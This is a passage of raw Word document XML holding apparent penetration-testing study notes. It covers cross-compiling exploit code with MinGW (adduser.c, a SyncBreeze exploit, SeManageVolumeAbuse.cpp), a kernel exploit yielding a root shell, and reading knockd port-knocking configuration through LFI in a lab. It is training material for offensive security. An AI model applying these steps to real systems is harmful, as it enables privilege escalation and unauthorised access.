              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image29.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1154"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4014788" cy="2676525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036C3">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Great! We managed to obtain a root shell by exploiting a known kernel vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036C4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this section, we learned how to manually enumerate our target for any known kernel vulnerabilities. We then discovered how to feed searchsploit our information to select the right exploit source code. Finally, we compiled the exploit and ran it against the target machine to gain an administrative shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036C5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036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6C7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1anqwl6hb6uy" w:id="489"/>
      <w:bookmarkEnd w:id="489"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Compiling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036C9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Taught in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXXXXXXXX 13.1.3. Cross-Compiling Exploit Code</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036CA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036CB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e5evh5g7emma" w:id="490"/>
      <w:bookmarkEnd w:id="490"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.c to .exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="606"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install mingw-w64</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="606"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">x86_64-w64-mingw32-gcc adduser.c -o adduser.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1190"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is an example of a cross-compiler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1190"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">compiles the C source code </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">adduser.c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> into a Windows executable binary called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">adduser.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, using the MinGW (Minimalist GNU for Windows) cross-compiler on a Kali Linux system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1190"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the 17.2.1 Video from XXXXXXXXX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036D1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036D2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036D3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036D4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Handling errors:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036D5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="5626100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="347" name="image340.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image340.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1155"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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36D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="275"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="275"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX 13.1.3. Cross-Compiling Exploit Code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036D8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tnkhvy6bhhbu" w:id="491"/>
      <w:bookmarkEnd w:id="491"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.cpp to .exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036D9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.cpp is for C++ (the "p" stands for plus)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036DB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install mingw-w64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">x86_64-w64-mingw32-g++ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SeManageVolumeAbuse.cpp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SeManageVolumeAbuse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036DE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036DF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036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6E1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_odd9gwuvwcr3" w:id="492"/>
      <w:bookmarkEnd w:id="492"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">knockd (port knocking)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First seen on the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1156">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DC-9</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036E3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036E4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Knocked is a tool sometimes downloaded on Linux Machines. It is a port knocking server (daemon). If downloaded, you should be able to access </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/knockd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036E5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036E6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port Knocking Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="285"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port knocking is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">network access control method</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> used to hide a service (like SSH) behind a closed port, making it appear invisible to port scans or attackers — until a special sequence of connection attempts (the "knock") is performed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="285"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Often, a "close sequence" (like 9842, 8475, 7469) is also set up to lock the port back when done.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036E9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036EA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1157">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DC-9</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, they had LFI and they checked </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/knockd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036EB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036EC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2679700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="284" name="image286.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image286.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1158"/>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36ED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4252913" cy="2290030"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="38" name="image35.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image35.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1159"/>
